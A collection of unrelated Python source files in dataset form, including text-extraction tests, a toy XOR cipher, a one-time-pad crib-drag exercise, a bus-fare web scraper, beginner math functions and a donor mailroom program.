test_ngrams_min_freq(self):\n n = 2\n counts = collections.Counter()\n counts.update(self.spacy_doc[i: i + n].lower_\n for i in range(len(self.spacy_doc) - n + 1))\n result = [span for span in extract.ngrams(\n self.spacy_doc, n,\n filter_stops=False, filter_punct=False, filter_nums=False,\n min_freq=2)]\n self.assertTrue(all(counts[span.lower_] >= 2 for span in result))\n\n def test_ngrams_good_tag(self):\n result = [span for span in extract.ngrams(\n self.spacy_doc, 2, filter_stops=False, filter_punct=False, filter_nums=False,\n include_pos={'NOUN'})]\n self.assertTrue(all(tok.pos_ == 'NOUN' for span in result for tok in span))\n\n def test_named_entities(self):\n result = [ent for ent in extract.named_entities(\n self.spacy_doc, drop_determiners=False)]\n self.assertTrue(all(ent.label_ for ent in result))\n self.assertTrue(all(ent[0].ent_type for ent in result))\n\n def test_named_entities_good(self):\n include_types = {'PERSON', 'GPE'}\n result = [ent for ent in extract.named_entities(\n self.spacy_doc, include_types=include_types, drop_determiners=False)]\n self.assertTrue(all(ent.label_ in 
include_types for ent in result))\n\n def test_named_entities_min_freq(self):\n expected = []\n observed = [ent.text for ent in extract.named_entities(\n self.spacy_doc, drop_determiners=True, min_freq=2)]\n self.assertEqual(observed, expected)\n\n def test_named_entities_determiner(self):\n expected = ['the Middle East', 'the United States']\n observed = [ent.text for ent in extract.named_entities(\n self.spacy_doc, drop_determiners=False) if ent[0].pos_ == 'DET']\n self.assertEqual(observed, expected)\n\n @unittest.skip('waiting to hear back from spaCy, see issue #365')\n def test_noun_chunks(self):\n expected = [\n 'I', 'Kuwait', 'I.M.F. seminar', 'Arab educators', '30 minutes', 'we',\n 'impact', 'technology trends', 'education', 'Middle East', 'Egyptian education official',\n 'his hand', 'he', 'personal question', 'I', 'Donald Trump', 'we', 'mosques',\n 'United States', 'he', 'great sorrow', 'what', 'we', 'our kids']\n observed = [nc.text for nc in extract.noun_chunks(\n self.spacy_doc, drop_determiners=True)]\n self.assertEqual(observed, expected)\n\n @unittest.skip('waiting to hear back from spaCy, see issue #365')\n def test_noun_chunks_determiner(self):\n expected = [\n 'I', 'Kuwait', 'an I.M.F. seminar', 'Arab educators', '30 minutes', 'we',\n 'the impact', 'technology trends', 'education', 'the Middle East',\n 'an Egyptian education official', 'his hand', 'he', 'a personal question',\n 'I', 'Donald Trump', 'we', 'mosques', 'the United States', 'he', 'great sorrow',\n 'what', 'we', 'our kids']\n observed = [nc.text for nc in extract.noun_chunks(\n self.spacy_doc, drop_determiners=False)]\n self.assertEqual(observed, expected)\n\n @unittest.skip('waiting to hear back from spaCy, see issue #365')\n def test_noun_chunks_min_freq(self):\n expected = ['I', 'we', 'he', 'I', 'we', 'he', 'we']\n observed = [nc.text for nc in extract.noun_chunks(\n self.spacy_doc, drop_determiners=True, min_freq=2)]\n self.assertEqual(observed, expected)\n\n def test_pos_regex_matches(self):\n expected = [\n 'Two weeks', 'Kuwait', 'an I.M.F. 
seminar', 'Arab educators',\n '30 minutes', 'the impact', 'technology trends', 'education',\n 'the Middle East', 'an Egyptian education official', 'his hand',\n 'a personal question', 'Donald Trump', 'mosques',\n 'the United States', 'great sorrow', 'that what', 'our kids']\n observed = [span.text for span in extract.pos_regex_matches(\n self.spacy_doc, constants.POS_REGEX_PATTERNS['en']['NP'])]\n self.assertEqual(observed, expected)\n\n def test_subject_verb_object_triples(self):\n expected = [\n 'we, discussed, impact', 'education official, raised, hand', 'he, could ask, me',\n 'he, could ask, question', 'we, need, to close']\n observed = [', '.join(item.text for item in triple) for triple in\n extract.subject_verb_object_triples(self.spacy_doc)]\n self.assertEqual(observed, expected)\n\n def test_acronyms_and_definitions(self):\n expected = {'I.M.F.': ''}\n observed = extract.acronyms_and_definitions(self.spacy_doc)\n self.assertEqual(observed, expected)\n\n def test_acronyms_and_definitions_known(self):\n expected = {'I.M.F.': 'International Monetary Fund'}\n observed = extract.acronyms_and_definitions(\n self.spacy_doc, known_acro_defs={'I.M.F.': 'International Monetary Fund'})\n self.assertEqual(observed, expected)\n\n @unittest.skip(\"direct quotation extraction needs to be improved; it fails here\")\n def test_direct_quotations(self):\n expected = [\n 'he, said, \"I heard Donald Trump say we need to close mosques in the United States,\"',\n 'he, said, \"Is that what we want our kids to learn?\"']\n observed = [', '.join(item.text for item in triple) for triple in\n extract.direct_quotations(self.spacy_doc)]\n self.assertEqual(observed, expected)\n","sub_path":"tests/test_extract.py","file_name":"test_extract.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"469348227","text":"import prime\r\nimport xor_crypt\r\nimport random\r\n\r\n\"\"\"\r\nConverts the integer into its hex form.\r\nIf the number is smaller than the intended bitlength, pad the value with zeroes in the front.\r\n\r\nInput: the integer (num) and the desired length (bitlength)\r\nOutput: the padded hex form (out)\r\n\"\"\"\r\ndef int_to_hex(num, bitlength):\r\n str = hex(num)[2:]\r\n while len(str)*4 < bitlength:\r\n str = '0' + str\r\n return str\r\n\r\n\"\"\"\r\nTakes in a list and makes all objects the same length without changing their values by padding.\r\n\r\nInput: list of objects (lst)\r\nOutput: the padded objects concatenated together and formed into a string (out)\r\n\"\"\"\r\ndef balance_len(lst):\r\n str_len = max([len(x) for x in lst])\r\n lst_out = []\r\n for i in lst:\r\n while len(i) < str_len:\r\n i = '0' + i\r\n lst_out.append(i)\r\n out = \"\"\r\n for i in lst_out:\r\n out = out + i\r\n return out\r\n\r\n\"\"\"\r\nTakes in the node organization, the number of series nodes and the number of parallel nodes, and returns the combined key.\r\nThe key is created by generating 128 bit prime numbers. 
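# Worked example of the header layout this docstring describes: the first
# four hex digits carry series_num, the next four carry para_num (the values
# here are made up), matching what node_nums() parses back out:
header = format(2, '04x') + format(3, '04x')   # -> '00020003'
assert (int(header[:4], 16), int(header[4:8], 16)) == (2, 3)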
The total number of such keys is given by series_num*para_num.\r\n\r\nInput: Node organization (series_num, para_num) and the base key's bitlength (bitlength)\r\nOutput: The combination key (key)\r\n\"\"\"\r\ndef create_key(series_num, para_num, bitlength = 128):\r\n num_nodes = series_num*para_num\r\n ser_str = str(hex(series_num))[2:]\r\n while len(ser_str) < 4:\r\n ser_str = \"0\" + ser_str\r\n par_str = str(hex(para_num))[2:]\r\n while len(par_str) < 4:\r\n par_str = \"0\" + par_str\r\n key = ser_str + par_str\r\n for i in range(num_nodes):\r\n key = key + str(hex(prime.generate_a_prime_number(bitlength)))[2:]\r\n return key\r\n\r\n\"\"\"\r\nTakes in the combined key and extracts and returns the metadata regarding node organization.\r\n\r\nInput: The combination key (key)\r\nOutput: Node organization (series_num, para_num)\r\n\"\"\"\r\ndef node_nums(key):\r\n series_num = int(key[:4], 16)\r\n para_num = int(key[4:8], 16)\r\n return series_num, para_num\r\n\r\n\"\"\"\r\nTakes in a message and splits it into exactly num parts\r\n\r\nInput: Message (msg), and the number of splits (num)\r\nOutput: List of strings containing the split segments (lst_out)\r\n\"\"\"\r\ndef str_split(msg, num):\r\n lst = []\r\n chunk = int(len(msg)/num)\r\n counter = 1\r\n while counter < num:\r\n tmp = msg[:chunk]\r\n msg = msg[chunk:]\r\n lst.append(tmp)\r\n counter += 1\r\n lst.append(msg)\r\n str_len = max(len(x) for x in lst)\r\n lst_out = []\r\n for i in lst:\r\n while len(i) < str_len:\r\n i = '0' + i\r\n lst_out.append(i)\r\n return lst_out\r\n\r\n\"\"\"\r\nTakes care of the series nodes in message encryption.\r\n\r\nInput: Message (msg), key (key), and the number of series nodes (series_num)\r\nOutput: The encrypted portion in hex form\r\n\"\"\"\r\ndef series_encrypt(msg, key, series_num):\r\n key_lst = str_split(key, series_num)\r\n out = int(msg, 16)\r\n for key in key_lst:\r\n k = int(key, 16)\r\n out = xor_crypt.encrypt(out, k)\r\n return int_to_hex(out, 128)\r\n\r\n\"\"\"\r\nTakes care of the series nodes in message decryption.\r\n\r\nInput: Ciphertext (ciph), key (key), and the number of series nodes (series_num)\r\nOutput: The encrypted portion in hex form\r\n\"\"\"\r\ndef series_decrypt(ciph, key, series_num):\r\n key_lst = str_split(key, series_num)\r\n out = int(ciph, 16)\r\n for key in key_lst:\r\n k = int(key, 16)\r\n out = xor_crypt.decrypt(out, k)\r\n return int_to_hex(out, 128)\r\n\r\n\"\"\"\r\nTakes care of the parallel nodes in message encryption.\r\n\r\nInput: Message (msg), and the combination key (key)\r\nOutput: The padded ciphertext\r\n\"\"\"\r\ndef encrypt(msg, key):\r\n series_num, para_num = node_nums(key)\r\n key_rest = key[8:]\r\n msg_lst = str_split(msg, para_num)\r\n key_lst = str_split(key_rest, para_num)\r\n para_map = zip(msg_lst, key_lst)\r\n ciph_lst = []\r\n for a in para_map:\r\n ciph_lst.append(series_encrypt(a[0], a[1], series_num))\r\n return balance_len(ciph_lst)\r\n\r\n\"\"\"\r\nTakes care of the parallel nodes in message decryption.\r\n\r\nInput: Ciphertext (ciph), and the combination key (key)\r\nOutput: The padded message\r\n\"\"\"\r\ndef decrypt(ciph, key):\r\n series_num, para_num = node_nums(key)\r\n key_rest = key[8:]\r\n ciph_lst = str_split(ciph, para_num)\r\n key_lst = str_split(key_rest, para_num)\r\n para_map = zip(ciph_lst, key_lst)\r\n out = \"\"\r\n for a in para_map:\r\n out = out + series_encrypt(a[0], a[1], series_num)\r\n return out\r\n\r\n\"\"\"\r\n#CORRECTNESS TEST\r\nresult = True\r\ncounter = 0\r\nwhile result and counter < 1000000:\r\n 
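# The round trip exercised in this test rests on XOR being its own inverse,
# and the .replace('0', ...) calls work around zero-padding: leading zeros
# added by the padding helpers are indistinguishable from zeros in the data.
# Minimal illustration of the involution property:
m, k = 0x1234, 0xbeef
assert (m ^ k) ^ k == m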
series = random.getrandbits(5) \r\n para = random.getrandbits(5)\r\n if series == 0:\r\n series = 1\r\n if para == 0:\r\n para = 1\r\n k = create_key(series, para)\r\n msg = hex(random.getrandbits(1024))[2:].replace('0', '1')\r\n e = encrypt(msg, k)\r\n o_msg = decrypt(e, k).replace('0', '')\r\n result = msg == o_msg and msg != e\r\n if not result:\r\n print(msg, o_msg)\r\n counter += 1\r\n\r\nif result:\r\n print(\"TEST SUCCESSFUL!\")\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"symConstruct.py","file_name":"symConstruct.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"543067432","text":"import os\nfrom pathlib import Path\nfrom datetime import date, datetime\nfrom uuid import uuid4\nfrom shlex import split as shlex_split\n\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom . import RenguTemplate\n\n\nclass RenguTemplateJinja:\n def __init__(self, ctx):\n\n self.template_dir = Path(os.environ.get(\"RENGU_TEMPLATE_DIR\"))\n\n self.jinja_loader = Environment(loader=FileSystemLoader(self.template_dir))\n\n self.jinja_loader.globals = {\n \"DATE\": date.today().strftime(\"%Y%m%d\"),\n \"DATETIME\": datetime.now().strftime(\"%Y%m%d.%H%M\"),\n \"UUID\": uuid4,\n }\n\n def list_templates(self):\n yield from [p.stem for p in self.template_dir.glob(\"*.jinja\")]\n\n def load_template(self, template: str, *arguments) -> str:\n\n extra_environment = {}\n\n # arguments = shlex_split(\" \".join(arguments))\n\n for e in arguments:\n if \"=\" in e:\n k, v = e.split(\"=\", 1)\n extra_environment[k] = v\n else:\n extra_environment[e] = True\n\n return self.jinja_loader.get_template(template + \".jinja\").render(\n **extra_environment\n )\n","sub_path":"rengu/template/jinja.py","file_name":"jinja.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313026157","text":"import binascii\n\n\ndef get_val(hex_byte):\n return int(hex_byte, 16)\n\n\ndef get_char(hex_byte):\n print(hex_byte + \" should be two bytes\")\n a = hex_byte[0]\n b = hex_byte[1]\n\n rest = get_val(a)\n rest = rest * 16 + get_val(b)\n\n return chr(rest)\n\n\ndef get_m(hex_text):\n rest = ''\n\n i = 0\n\n print(hex_text + \" should be sliced\")\n\n while i < 10:\n rest += get_char(hex_text[i: i + 2])\n i += 2\n\n return rest\n\n\nwith open('cipher_texts.txt', 'r') as myfile:\n content = myfile.read()\n data = content.split('\\n')\n\ncopher_text = data[0]\ndata.pop(0)\n\nc1 = data[0]\nc2 = data[1]\n\nm1_xor_m2 = ''\n\nmin_length = min(len(c1), len(c2))\n\nfor i in range(0, min_length):\n m1_xor_m2 += '%x' % (int(c1[i], 16) ^ int(c2[i], 16))\n\nprint(m1_xor_m2)\n\ndees = binascii.hexlify(b' the ')\n\nfor i in range(0, min_length - 11):\n substr = m1_xor_m2[i: i + 10]\n print(substr + \" is substr\")\n mb = '%x' % (int(dees, 16) ^ int(substr, 16))\n print(mb)\n print(get_m(mb) + \" for \" + str(i))\n","sub_path":"week 1/otp.py","file_name":"otp.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187804519","text":"# -*- coding: utf-8 -*-\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, TextAreaField, SubmitField\nfrom wtforms.validators import DataRequired, Length\n\n\nclass ContentForm(FlaskForm):\n title = StringField('Title',\n validators=[DataRequired(\"Title is required!\"),\n Length(min=1, max=150, 
message=\"Title must be between 1 and 150 characters long.\")])\n tags = StringField('Tags',\n validators=[DataRequired(\"Tags are required!\"),\n Length(min=1, max=150, message=\"Sum len of tags must be between 1 and 150 characters long.\")])\n text = TextAreaField()\n\n submit = SubmitField(\"Add content\")\n","sub_path":"storage/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"382546727","text":"from __future__ import division, print_function\n\n# # infinite loop below because k never becomes greater than M\n# s = 0; k = 1; M = 100\n# while k < M:\n# s += 1/k\n# print(s)\n\ns = 0\nk = 1\nM = 100\nwhile s < M:\n s += 1/k\nprint(s)\n","sub_path":"2-12_sum_while.py","file_name":"2-12_sum_while.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"155791836","text":"# stripped down BoltBus script \nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Response \nfrom scrapy.http import TextResponse \nimport time\n\n# set dates, origin, destination \ncityOrigin=\"Baltimore\"\ncityDeparture=\"New York\"\nday_array=[0]\nbrowser = webdriver.Chrome()\n\n# we are going the day of the days of the month from 15,16,...,25\n# there is a discrepancy between the index of the calendar days and the day itself: for example day[10] may correspond to Feb 7th\nfor day in day_array:\n\n # Create a new instance of the Firefox driver\n browser.get(\"http://www.boltbus.com\")\n\n # click on \"region\" tab\n elem_0=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_lstRegion_textBox\")\n elem_0.click()\n time.sleep(5) \n\n # select Northeast\n elem_1=browser.find_element_by_partial_link_text(\"Northeast\")\n elem_1.click()\n time.sleep(5)\n\n # click on origin city\n elem_2=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_lstOrigin_textBox\")\n elem_2.click()\n time.sleep(5)\n\n # select origin city\n elem_3=browser.find_element_by_partial_link_text(cityOrigin)\n elem_3.click()\n time.sleep(5)\n\n # click on destination city \n elem_4=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_lstDestination_textBox\")\n elem_4.click()\n time.sleep(5)\n\n # select destination city \n elem_5=browser.find_element_by_partial_link_text(cityDeparture)\n elem_5.click()\n time.sleep(5)\n\n # click on travel date\n travel_date_elem=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_imageE\")\n travel_date_elem.click() \n\n # gets day rows of table\n date_rows=browser.find_elements_by_class_name(\"daysrow\") \n\n # select actual day (use variable day)\n # NOTE: you must make sure these day elements are \"clickable\"\n days=date_rows[0].find_elements_by_xpath(\"..//td\")\n days[day].click()\n time.sleep(3) \n\n # retrieve actual departure date from browser\n depart_date_elem=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_txtDepartureDate\")\n depart_date=str(depart_date_elem.get_attribute(\"value\"))\n\n # PARSE TABLE\n\n # convert html to \"nice format\"\n text_html=browser.page_source.encode('utf-8')\n html_str=str(text_html)\n\n # this is a hack that initiates a \"TextResponse\" object (taken from the Scrapy 
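# Keyword-argument form of the TextResponse construction used just below,
# which avoids the positional hack ('about:blank' is an arbitrary placeholder
# URL; browser is the selenium driver from above):
from scrapy.http import TextResponse
resp_for_scrapy = TextResponse(url='about:blank',
                               body=browser.page_source,
                               encoding='utf-8')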
module)\n    resp_for_scrapy=TextResponse('none',200,{},html_str,[],None)\n\n    # takes a \"TextResponse\" object and feeds it to a scrapy function which will convert the raw HTML to an XPath document tree\n    hxs=HtmlXPathSelector(resp_for_scrapy)\n\n    # the | sign means \"or\"\n    table_rows=hxs.select('//tr[@class=\"fareviewrow\"] | //tr[@class=\"fareviewaltrow\"]')\n    row_ct=len(table_rows)\n\n    for x in range(row_ct):\n\n        cur_node_elements=table_rows[x]\n        travel_price=cur_node_elements.select('.//td[@class=\"faresColumn0\"]/text()').re(\"\\d{1,3}\\.\\d\\d\")\n\n        # I use a mixture of xpath selectors to get me to the right location in the document, and regular expressions to get the exact data\n\n        # actual digits of time \n        depart_time_num=cur_node_elements.select('.//td[@class=\"faresColumn1\"]/text()').re(\"\\d{1,2}\\:\\d\\d\")\n\n        # AM or PM (time signature)\n        depart_time_sig=cur_node_elements.select('.//td[@class=\"faresColumn1\"]/text()').re(\"[AP][M]\")\n\n        # actual digits of time \n        arrive_time_num=cur_node_elements.select('.//td[@class=\"faresColumn2\"]/text()').re(\"\\d{1,2}\\:\\d\\d\")\n\n        # AM or PM (time signature)\n        arrive_time_sig=cur_node_elements.select('.//td[@class=\"faresColumn2\"]/text()').re(\"[AP][M]\")\n\n        print(\"Depart date: \" + depart_date)\n        print(\"Depart time: \" + depart_time_num[0] + \" \" + depart_time_sig[0])\n        print(\"Arrive time: \" + arrive_time_num[0] + \" \" + arrive_time_sig[0])\n        print(\"Cost: \" + \"$\" + travel_price[0]) \n        print(\"\\n\")","sub_path":"scrapy_selenium_bus_template_clicking_parsing.py","file_name":"scrapy_selenium_bus_template_clicking_parsing.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389076553","text":"def iterativeFactorial(number):\n\tx = 1\n\tfor i in range (1, number+1):\n\t\tx *= i\n\treturn x\n\n\ndef factorial(number):\n\tif number == 0:\n\t\treturn 1\n\telse:\n\t\treturn number*factorial(number-1)\n\ndef fibonacci(number):\n\tif number == 0:\n\t\treturn 0\n\telif number == 1:\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(number-1) + fibonacci(number-2)\n\ndef iterativeFibonacci(number):\n\ti = 1\n\tj = 0\n\tfor k in range (1, number+1):\n\t\tt = i+j\n\t\ti = j\n\t\tj = t\n\treturn j\n\ndef mdc(a, b):\n\tif b == 0:\n\t\treturn a\n\telse:\n\t\treturn mdc(b, a%b)\n\ndef prime(number):\n\tif number == 1:\n\t\treturn 'not prime'\n\telif number == 2:\n\t\treturn 'is prime'\n\telse:\n\t\td = 2\n\t\twhile d < number:\n\t\t\tif(number%d == 0):\n\t\t\t\treturn 'not prime'\n\t\t\telse:\n\t\t\t\td += 1\n\t\treturn 'is prime'\n\n#print(iterativeFactorial(1))\n#print(factorial(5))\n#print(fibonacci(29))\nprint(iterativeFibonacci(29))\nprint(mdc(2, 2))\nprint(prime(611953))","sub_path":"Class_1/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"523230526","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 08 18:49:02 2016\n\n@author: rajat\n\"\"\"\n\nimport numpy as np\nfrom scipy.spatial import distance\n\npositionDataFile = open('position.txt', 'r')  # text mode, so split(' ') works on str\npositionData = []\n\nfor data in positionDataFile:\n    info = data.split(' ')\n    x,y = info[0], info[1]\n    if x=='None' and y==' None':\n        x,y = 0,0\n    else:\n        x,y = float(x), float(y)\n    positionData.append([x,y])\n\nlinear_velocity = []\n\n\n# compute the Euclidean distance between consecutive points and divide by the\n# elapsed time; t is assumed to be a matching array of timestamps (it is not\n# defined in this script)\nfor i in range(1,len(positionData)-1):\n    point1 = np.asarray(positionData[i-1])\n    point2 = np.asarray(positionData[i])\n    dist = distance.euclidean(point1, point2)  # do not shadow the scipy 'distance' module\n    velocity = dist/(t[i] - t[i-1])\n    linear_velocity.append(velocity)\n    \n","sub_path":"Miscellaneous/linearVelocity.py","file_name":"linearVelocity.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"493147388","text":"#!/usr/bin/env python3.6\nimport datetime as dt\n\n\ndef prompt_for_amount(name):\n    \"\"\" Prompt user for donation amount and return value. \"\"\"\n    amount = input(f\"How much did {name} donate? \")\n\n    return ''.join(amount.split('$')[-1].split(','))\n\n\ndef add_new_donor(donors, name, amount):\n    \"\"\" Add new donor and donation amount to donor database. \"\"\"\n    donors[name] = dict([('name', name), ('donations', [float(amount)]),\n                         ('latest_don', float(amount))])\n\n\ndef add_donation_to_history(donors, name, amount):\n    \"\"\" Add new donation to existing donor's records \"\"\"\n    donors[name]['donations'].append(float(amount))\n    donors[name]['latest_don'] = float(amount)\n\n\ndef verify_add_donor(name):\n    \"\"\" Prompt until the user confirms or declines adding the new donor. \"\"\"\n    while True:\n        response = input(f\"Are you sure you want to add {name}? [Y/n] \")\n\n        # 'Y' is default response.\n        if response == '': response = 'y'\n        \n        if response.lower() in ['y', 'n', 'yes', 'no']: return response.lower()\n\n\ndef list_donor_names(donors):\n    \"\"\" Print current list of donors to screen. \"\"\"\n    [print(k) for k in donors.keys()]\n\n    return\n\n\ndef blank_lines(number_lines=1):\n    \"\"\" Return number_lines '\\n' as string \"\"\"\n    return '\\n' * (number_lines + 1)\n    \n\ndef letter_date():\n    \"\"\" Return today's date, formatted for letter preamble. \"\"\"\n    return dt.datetime.now().strftime('%d %B %Y')\n\n\ndef letter_preamble(name):\n    \"\"\" Return Thank You letter preamble. \"\"\"\n    preamble = letter_date()\n    preamble += blank_lines(2)\n    preamble += f\"Dear {name},\"\n    preamble += blank_lines()\n\n    return preamble\n\n\ndef letter_body(amount):\n    \"\"\" Return body of Thank You letter. \"\"\"\n    body = (\n        f'Thank you for your generous donation of ${float(amount):,.2f}. Your gracious support '\n        'helps us continue our important work doing what we do. We look forward to continuing to '\n        'partner with you in the future. Please contact us if you have any questions or have any '\n        'interest in arranging a visit.'\n    )\n\n    return body\n\n\ndef letter_closing():\n    \"\"\" Return closing and signature of Thank You letter. \"\"\"\n    closing = blank_lines()\n    closing += 'Sincerely,'\n    closing += blank_lines(2)\n    closing += 'Mr. F\\nActing Director\\n(800) 555-1234'\n\n    return closing\n\n\ndef compose_letter(name, amount):\n    \"\"\" Print donation Thank You letter to screen. \"\"\"\n    letter = letter_preamble(name)\n    letter += letter_body(amount)\n    letter += letter_closing()\n\n    return letter\n\n\ndef print_letter(letter_content):\n    \"\"\" Style beginning and end of letter and print to console. \"\"\"\n    print(f'\\n{letter_content}\\n')\n\n\ndef send_letters_all(donors):\n    \"\"\" Write Thank You letters to file for everyone in donor dict. \"\"\"\n    # TODO prompt user for dir to store letters in, test for existence,\n    # and create if necessary. 
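# One way to close out the TODO above, creating the output directory before
# writing ('letters' mirrors the default path used in the loop below):
import os
os.makedirs('letters', exist_ok=True)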
Use letters/ as default\n for k, v in donors.items():\n fout_path = 'letters/'\n fout_name = f'{k.replace(\",\", \"\").replace(\" \", \"_\")}.txt'\n\n fout_path += fout_name\n with open(fout_path, 'w') as file:\n file.write(compose_letter_dict(donors, k))\n\n return\n\n\ndef compose_letter_dict(donors, name):\n \"\"\" Return Thank You letter composed from single template, filled with dict. \"\"\"\n letter = (\n f'{letter_date()}'\n f'{blank_lines(2)}'\n 'Dear {name},\\n\\nThank you for your generous donation of ${latest_don:,.2f}. '\n 'Your gracious support helps us continue our important work doing what we do. '\n 'We look forward to continuing to partner with you in the future. Please contact '\n 'us if you have any questions or have any interest in arranging a visit.'\n f'{blank_lines()}Sincerely,{blank_lines(2)}Mr. F\\nActing Director\\n'\n '(800) 555-1234'.format(**donors[name])\n )\n\n return letter\n \n\ndef hor_bar(count=35):\n \"\"\" \"\"\"\n return \"-\" * count\n\n\ndef main_menu_prompt():\n \"\"\" \"\"\"\n response = input(\" (1) Send a 'Thank You'\\n\"\n \" (2) Create a Report\\n\"\n \" (3) Send letters to everyone\\n\"\n \" (4) quit\\n\"\n \"--> \")\n\n if response.lower() in ['1', 'send a thank you', 'thank you']:\n return 0\n\n elif response.lower() in ['2', 'create', 'report', 'create a report']:\n return 1\n\n elif response.lower() in ['3', 'send letters to everyone']:\n return 2\n\n elif response.lower() in ['4', 'q', 'quit', 'exit']:\n return 3\n\n\ndef thank_you_prompt(donors):\n \"\"\" Direct Thank You letter menu user input \"\"\"\n print(hor_bar())\n print(\"[Send 'Thank You' menu]\\n\"\n \"Type 'menu' to return to main menu.\")\n \n while True:\n response = input('--> ')\n\n if response in ['list', 'l']:\n list_donor_names(donors)\n\n elif response in ['m', 'menu']: break\n\n elif response.lower() not in [k.lower() for k in donors.keys()]:\n new_donor = response\n verify = verify_add_donor(new_donor)\n\n if verify[0] == 'y':\n amount = prompt_for_amount(new_donor)\n add_new_donor(donors, new_donor, amount)\n\n # letter = compose_letter(new_donor, amount)\n letter = compose_letter_dict(donors, new_donor)\n print_letter(letter)\n \n return\n\n elif response.lower() in [k.lower() for k in donors.keys()]:\n donor = response\n new_amount = prompt_for_amount(donor)\n add_donation_to_history(donors, donor, new_amount)\n\n letter = compose_letter(donor, new_amount)\n print_letter(letter)\n\n return\n\n return\n\n\ndef report_prompt():\n \"\"\" Direct report menu user input. \"\"\"\n print(hor_bar())\n print(\"[Donor Summary Report]\\n\")\n\n print(assemble_report())\n\n return\n # return donors\n\n\ndef assemble_report():\n \"\"\" Return nicely formatted donor report. \"\"\"\n col_widths = [25, 20, 12, 20]\n headers = ['Donor Name', 'Total Given', 'Num Gifts', 'Average Gift']\n\n header_row = assemble_header(headers, col_widths)\n hor_line = hor_bar(len(header_row))\n table_body = assemble_table(col_widths)\n\n return f'{header_row}\\n{hor_line}\\n{table_body}'\n\n\ndef assemble_header(headers, col_widths):\n \"\"\" Return header row for donor report table. \"\"\"\n header = f'{headers[0]:<{col_widths[0]-1}}'\n\n count = 1\n for field in headers[1:]:\n header += f'|{headers[count]:^{col_widths[count]+1}}'\n count+=1\n\n return header\n\n\ndef assemble_table(col_widths):\n \"\"\" Return table body, fetching all computed values from other functions. 
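# The table formatting in this file nests one format spec inside another;
# the inner {width} expression is substituted first. Tiny standalone
# illustration:
width = 12
row = f'{"Donor":<{width}}|'   # -> 'Donor       |'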
\"\"\"\n table = ''\n\n for k, v in donors.items():\n total = get_total(k)\n num_gifts = get_num_gifts(k)\n avg_gift = get_avg_gift(k)\n # import pdb; pdb.set_trace()\n table += (f'{k:<{col_widths[0]}}${total:{col_widths[1]},.2f}'\n f'{num_gifts:{col_widths[2]}d} ${avg_gift:{col_widths[3]},.2f}\\n')\n\n return table\n\n\ndef get_total(name):\n \"\"\" Return total donations for supplied donor name \"\"\"\n return sum(donors[name]['donations'])\n\n\ndef get_num_gifts(name):\n \"\"\" Return total number of gifts given by supplied donor name. \"\"\"\n return len(donors[name]['donations'])\n\n\ndef get_avg_gift(name):\n \"\"\" Return the average of all of the supplied donor's donations. \"\"\"\n return get_total(name) / get_num_gifts(name)\n\n\ndef init_database():\n # Initialize 5 donors and at least 1 donation for each.\n donors = dict([('William Gates, III', {'name': 'William Gates, III',\n 'donations': [1, 5, 100000000],\n 'latest_don': 100000000}),\n ('Mark Zuckerberg', {'name': 'Mark Zuckerberg',\n 'donations': [378000, 5000, 20.01],\n 'latest_don': 20.01}),\n ('Jeff Bezos', {'name': 'Jeff Bezos',\n 'donations': [29000000, 34000, 709000],\n 'latest_don': 709000}),\n ('Paul Allen', {'name': 'Paul Allen',\n 'donations': [750000, 513895, 30592.50],\n 'latest_don': 30592.50}),\n ('John Ferrell', {'name': 'John Ferrell',\n 'donations': [520000000000],\n 'latest_don': 520000000000})])\n\n return donors\n \n\ndef main(donors):\n \"\"\" Show main menu, prompting user for selection. \"\"\"\n while True:\n print(hor_bar())\n print('[Main menu]\\n'\n 'What would you like to do? (Select one):')\n\n switch_func_dict = {\n 0: thank_you_prompt,\n 1: report_prompt,\n 2: send_letters_all(donors)\n }\n\n response = None\n\n while response not in switch_func_dict.keys():\n response = main_menu_prompt()\n\n if response == 3: return\n\n try:\n switch_func_dict.get(response)()\n break\n except TypeError:\n print(\"Invalid input. Please select one:\")\n\n return\n\n\nif __name__ == '__main__':\n print('\\nWelcome to the Mailroom applicaton.')\n\n donors = init_database()\n \n main(donors)\n\n print('\\nThank you for using Mailroom. 
